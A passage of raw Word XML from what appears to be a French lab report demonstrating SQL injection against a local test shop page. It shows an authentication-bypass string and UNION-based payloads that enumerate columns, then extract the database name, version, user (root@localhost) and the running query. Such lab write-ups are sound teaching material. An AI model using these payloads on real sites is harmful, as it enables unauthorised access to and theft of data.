          <w:lang w:val="fr-FR" w:eastAsia="fr-F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-14605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5604510" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="294" y="0"/>
                <wp:lineTo x="0" y="271"/>
                <wp:lineTo x="0" y="21397"/>
                <wp:lineTo x="294" y="21532"/>
                <wp:lineTo x="21218" y="21532"/>
                <wp:lineTo x="21512" y="21397"/>
                <wp:lineTo x="21512" y="271"/>
                <wp:lineTo x="21218" y="0"/>
                <wp:lineTo x="294" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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4510" cy="3038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31557" w:rsidRPr="00D31557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Figure 5.2</w:t>
      </w:r>
      <w:r w:rsidR="00D31557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="00D31557">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Résultat du contournement de l’authentification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="00D31557" w:rsidRDefault="002015B4" w:rsidP="00D86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6870"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:after="12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On voit qu’à travers le </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4503E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‘ OR 1 -- -,</w:t>
      </w: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on a pu contourner le système d’authentification et passer à la page suivante. Donc on </w:t>
      </w:r>
      <w:r w:rsidR="00074D7C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>conclut</w:t>
      </w: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que la page n’est pas </w:t>
      </w:r>
      <w:r w:rsidR="00074D7C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>sécurisée</w:t>
      </w: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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="00D4503E" w:rsidRDefault="002015B4" w:rsidP="00D866CB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste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jc w:val="both"/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</w:pPr>
      <w:r w:rsidRPr="00D4503E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Injecter le paramètre d’une URL :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="00D31557" w:rsidRDefault="00F64E9B" w:rsidP="00D86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>Premièrement</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A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, on cherche une page qui contient un </w:t>
      </w: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>paramètre</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A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dans son URL. Puis, on teste si elle est injectable ou non par l’insertion de l’un de ces </w:t>
      </w:r>
      <w:r w:rsidR="00982A06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>caractères :</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D4503E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'</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A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>,</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D31557">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D4503E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"</w:t>
      </w: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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4503E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\</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A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, </w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D4503E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\\</w:t>
      </w:r>
      <w:r w:rsidR="00982A06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(attaque de syntaxe)</w:t>
      </w:r>
      <w:r w:rsidR="00260C2E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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00260C2E" w:rsidRPr="00D31557" w:rsidRDefault="00260C2E" w:rsidP="00D86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Voici la page </w:t>
      </w:r>
      <w:r w:rsidR="0021699F"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>résultante</w:t>
      </w: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de l’insertion de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A774C4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'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31557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dans l’URL :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E41C1A" w:rsidRPr="00D4503E" w:rsidRDefault="00A774C4" w:rsidP="00D45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ind w:left="567"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r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  <w:lang w:val="fr-FR" w:eastAsia="fr-F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344805</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5762625" cy="779145"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="286" y="0"/>
                <wp:lineTo x="0" y="1056"/>
                <wp:lineTo x="0" y="20597"/>
                <wp:lineTo x="286" y="21125"/>
                <wp:lineTo x="21279" y="21125"/>
                <wp:lineTo x="21564" y="20597"/>
                <wp:lineTo x="21564" y="1056"/>
                <wp:lineTo x="21279" y="0"/>
                <wp:lineTo x="286" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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79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41C1A" w:rsidRPr="00D4503E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http://localhost/injection1/page_achat.php?id_pro=11</w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D4503E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41C1A" w:rsidRPr="00D4503E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'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A774C4" w:rsidRPr="00A774C4" w:rsidRDefault="00A774C4" w:rsidP="004E5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jc w:val="center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A774C4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Figure 5.3</w:t>
      </w:r>
      <w:r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Test d’</w:t>
      </w:r>
      <w:r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>injection par ‘</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723445" w:rsidRPr="00A774C4" w:rsidRDefault="00530991" w:rsidP="004E5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>Ce message d’erreur indique que la page est vulnérable</w:t>
      </w:r>
      <w:r w:rsidR="00F30142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>,</w:t>
      </w:r>
      <w:r w:rsidR="007837EC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dès lors, on peut extraire toutes les informations qu’on veut de la base de données. Pour cela</w:t>
      </w:r>
      <w:r w:rsidR="005A3FA5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, et pour plus d’exemples, </w:t>
      </w:r>
      <w:r w:rsidR="007837EC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on va utiliser </w:t>
      </w:r>
      <w:r w:rsidR="00F30142" w:rsidRPr="00723445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UNION</w:t>
      </w:r>
      <w:r w:rsidR="00F30142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(attaque sur la logique).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00160B78" w:rsidRPr="00A774C4" w:rsidRDefault="00744E13" w:rsidP="004E5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>Pour pouvoir utiliser </w:t>
      </w:r>
      <w:r w:rsidRPr="00723445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UNION</w:t>
      </w:r>
      <w:r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>, il faut savoir le nombre de colonne</w:t>
      </w:r>
      <w:r w:rsidR="00723445">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r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de la première requête</w:t>
      </w:r>
      <w:r w:rsidR="00160B78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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723445" w:rsidRDefault="00160B78" w:rsidP="004E5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12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>Le premier essai est le suivant :</w:t>
      </w:r>
      <w:r w:rsidR="00CD647A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="00CD647A" w:rsidRPr="00723445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union select 1</w:t>
      </w:r>
      <w:r w:rsidR="00CD647A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, son </w:t>
      </w:r>
      <w:r w:rsidR="00723445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>résultat</w:t>
      </w:r>
      <w:r w:rsidR="00CD647A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est </w:t>
      </w:r>
      <w:r w:rsidR="00723445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>illustré</w:t>
      </w:r>
      <w:r w:rsidR="00CD647A" w:rsidRPr="00A774C4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dans la figure</w:t>
      </w:r>
      <w:r w:rsidR="00723445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5.4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00723445" w:rsidRPr="005A41D9" w:rsidRDefault="004E5D3F" w:rsidP="004E5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8459CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR" w:eastAsia="fr-FR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-62865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5762625" cy="761365"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="286" y="0"/>
                <wp:lineTo x="0" y="1081"/>
                <wp:lineTo x="0" y="20537"/>
                <wp:lineTo x="286" y="21078"/>
                <wp:lineTo x="21279" y="21078"/>
                <wp:lineTo x="21564" y="20537"/>
                <wp:lineTo x="21564" y="1081"/>
                <wp:lineTo x="21279" y="0"/>
                <wp:lineTo x="286" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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61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723445" w:rsidRDefault="008459CD" w:rsidP="00845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center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8459CD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Figure 5.4</w:t>
      </w:r>
      <w:r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Résultat de la requête union select 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744E13" w:rsidRPr="008459CD" w:rsidRDefault="00A918E0" w:rsidP="00845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>Donc, le nombre de colonne est plus que 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A918E0" w:rsidRPr="008459CD" w:rsidRDefault="00A918E0" w:rsidP="00845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On essai : </w:t>
      </w:r>
      <w:r w:rsidRPr="008459CD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union select 1,2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sym w:font="Wingdings" w:char="F0E0"/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même message d’erreur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A918E0" w:rsidRPr="008459CD" w:rsidRDefault="00A918E0" w:rsidP="00845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: </w:t>
      </w:r>
      <w:r w:rsidRPr="008459CD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union select 1,2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sym w:font="Wingdings" w:char="F0E0"/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même message d’erreur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A918E0" w:rsidRPr="008459CD" w:rsidRDefault="00A918E0" w:rsidP="00845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: </w:t>
      </w:r>
      <w:r w:rsidRPr="008459CD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union select 1,2</w:t>
      </w:r>
      <w:r w:rsidR="000A5359" w:rsidRPr="008459CD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,3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sym w:font="Wingdings" w:char="F0E0"/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même message d’erreur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="008459CD" w:rsidRDefault="00A918E0" w:rsidP="00845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: </w:t>
      </w:r>
      <w:r w:rsidRPr="008459CD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union select 1,2</w:t>
      </w:r>
      <w:r w:rsidR="000A5359" w:rsidRPr="008459CD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,3,4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sym w:font="Wingdings" w:char="F0E0"/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même message d’erreur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A5359" w:rsidRPr="008459CD" w:rsidRDefault="000A5359" w:rsidP="00845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Et pour la </w:t>
      </w:r>
      <w:r w:rsidR="00EC1D90"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>requête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: </w:t>
      </w:r>
      <w:r w:rsidRPr="008459CD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union select 1,2,3,4,5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on aura le </w:t>
      </w:r>
      <w:r w:rsidR="00EC1D90"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>résultat</w:t>
      </w:r>
      <w:r w:rsidRPr="008459C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ci-dessous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRDefault="002F0CB0" w:rsidP="00F122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  <w:r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  <w:lang w:val="fr-FR" w:eastAsia="fr-F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144780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5567045" cy="2839085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="296" y="0"/>
                <wp:lineTo x="0" y="290"/>
                <wp:lineTo x="0" y="21015"/>
                <wp:lineTo x="222" y="21450"/>
                <wp:lineTo x="296" y="21450"/>
                <wp:lineTo x="21213" y="21450"/>
                <wp:lineTo x="21287" y="21450"/>
                <wp:lineTo x="21509" y="21015"/>
                <wp:lineTo x="21509" y="290"/>
                <wp:lineTo x="21213" y="0"/>
                <wp:lineTo x="296" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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7045" cy="28390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122B8" w:rsidRDefault="00F122B8" w:rsidP="00F122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8459CD" w:rsidRPr="00251D9A" w:rsidRDefault="008459CD" w:rsidP="0043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center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430875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Figure 5.5</w:t>
      </w:r>
      <w:r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Les colonnes </w:t>
      </w:r>
      <w:r w:rsidR="00430875">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>vulnérable qui s’affichent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F122B8" w:rsidRPr="00251D9A" w:rsidRDefault="00EC1D90" w:rsidP="00706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>D’après la figure en dessus,</w:t>
      </w:r>
      <w:r w:rsidR="0079691C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on voit que les colonne qui s’affiche sont: 3,4,5. On va tenter de d’extraire quelques choses plus </w:t>
      </w:r>
      <w:r w:rsidR="0070647A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>intéressante</w:t>
      </w:r>
      <w:r w:rsidR="0079691C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comme </w:t>
      </w:r>
      <w:r w:rsidR="0070647A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>l’extraction de</w:t>
      </w:r>
      <w:r w:rsidR="0079691C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nom de la base de données ou de l’utilisateur. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079691C" w:rsidRPr="00251D9A" w:rsidRDefault="00C03BA3" w:rsidP="00251D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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour cela, o</w:t>
      </w:r>
      <w:r w:rsidR="00EC629C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n passe cette </w:t>
      </w:r>
      <w:r w:rsidR="001D394F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>requête</w:t>
      </w:r>
      <w:r w:rsidR="00EC629C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dans l’URL</w:t>
      </w:r>
      <w:r w:rsidR="004D57C1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> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D394F" w:rsidRPr="00C03BA3" w:rsidRDefault="001D394F" w:rsidP="00C03BA3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left="567"/>
        <w:jc w:val="both"/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</w:pPr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union select 1,</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r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2,</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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('base de donne',0x3a,database()),</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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('version',</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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0x3a,version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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()),</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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group_concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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utili</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sateur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r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,0x3a,</w:t>
      </w:r>
      <w:r w:rsidR="00FC473D"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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>user())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C09DB" w:rsidRPr="00251D9A" w:rsidRDefault="00C03BA3" w:rsidP="00251D9A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>Son</w:t>
      </w:r>
      <w:r w:rsidR="005C09DB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="005E27DF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>résultat</w:t>
      </w:r>
      <w:r w:rsidR="005C09DB" w:rsidRPr="00251D9A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est le suivant :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E27DF" w:rsidRDefault="005E27DF" w:rsidP="005C09DB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5E27DF" w:rsidRDefault="005E27DF" w:rsidP="005E27DF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5C09DB" w:rsidRPr="00FC473D" w:rsidRDefault="005E27DF" w:rsidP="005E27DF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  <w:r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  <w:lang w:val="fr-FR" w:eastAsia="fr-FR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4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="3020695"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="286" y="0"/>
                <wp:lineTo x="0" y="272"/>
                <wp:lineTo x="0" y="21387"/>
                <wp:lineTo x="286" y="21523"/>
                <wp:lineTo x="21217" y="21523"/>
                <wp:lineTo x="21502" y="21387"/>
                <wp:lineTo x="21502" y="272"/>
                <wp:lineTo x="21217" y="0"/>
                <wp:lineTo x="286" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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20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E1C5D" w:rsidRDefault="00CE1C5D" w:rsidP="00CE1C5D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center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CE1C5D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Figure 5.6</w:t>
      </w:r>
      <w:r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Extraction de nom d’utilisateur, de base de données et la version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E27DF" w:rsidRPr="00C03BA3" w:rsidRDefault="001F09E8" w:rsidP="00CE1C5D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C03BA3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3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voit que la base de données est :</w:t>
      </w:r>
      <w:r w:rsidR="00C03BA3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="005E27DF" w:rsidRPr="00C03BA3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user</w:t>
      </w:r>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, la version de serveur de la base de données est :</w:t>
      </w:r>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3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r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>5.1.36-community-log</w:t>
      </w:r>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, le nom de l’utilisateur est :</w:t>
      </w:r>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3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proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E27DF" w:rsidRPr="00C03BA3">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F09E8" w:rsidRDefault="00F807C8" w:rsidP="00C03BA3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C03BA3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>On va maintenant extraire la requête courante qui s’exécute</w:t>
      </w:r>
      <w:r w:rsidR="00013ED6" w:rsidRPr="00C03BA3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en utilisant : </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283B63" w:rsidRPr="001F09E8" w:rsidRDefault="00013ED6" w:rsidP="001F09E8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left="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F09E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">union select 1,2,3,4,info from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F09E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema.processlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005E27DF" w:rsidRPr="001F09E8" w:rsidRDefault="00F807C8" w:rsidP="00283B63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="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F09E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00283B63"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  <w:lang w:val="fr-FR" w:eastAsia="fr-F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216535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760085" cy="3284855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="286" y="0"/>
                <wp:lineTo x="0" y="251"/>
                <wp:lineTo x="0" y="21295"/>
                <wp:lineTo x="286" y="21420"/>
                <wp:lineTo x="21217" y="21420"/>
                <wp:lineTo x="21502" y="21295"/>
                <wp:lineTo x="21502" y="251"/>
                <wp:lineTo x="21217" y="0"/>
                <wp:lineTo x="286" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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84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83B63" w:rsidRPr="001F09E8" w:rsidRDefault="00283B63" w:rsidP="005E27DF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="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F22A48" w:rsidRPr="00CE1C5D" w:rsidRDefault="00F22A48" w:rsidP="00CE1C5D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center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CE1C5D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Figure 5.7</w:t>
      </w:r>
      <w:r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="00CE1C5D"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>Afficher l</w:t>
      </w:r>
      <w:r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a </w:t>
      </w:r>
      <w:r w:rsidR="00CE1C5D"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>requête</w:t>
      </w:r>
      <w:r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courante qui s’</w:t>
      </w:r>
      <w:r w:rsidR="00CE1C5D"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>exécute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283B63" w:rsidRPr="00CE1C5D" w:rsidRDefault="00283B63" w:rsidP="00226607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Style w:val="lev"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE1C5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00226607" w:rsidRPr="00226607">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requêt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1C5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE1C5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE1C5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE1C5D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00226607">
        <w:rPr>
          <w:rStyle w:val="lev"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>produits</w:t>
      </w:r>
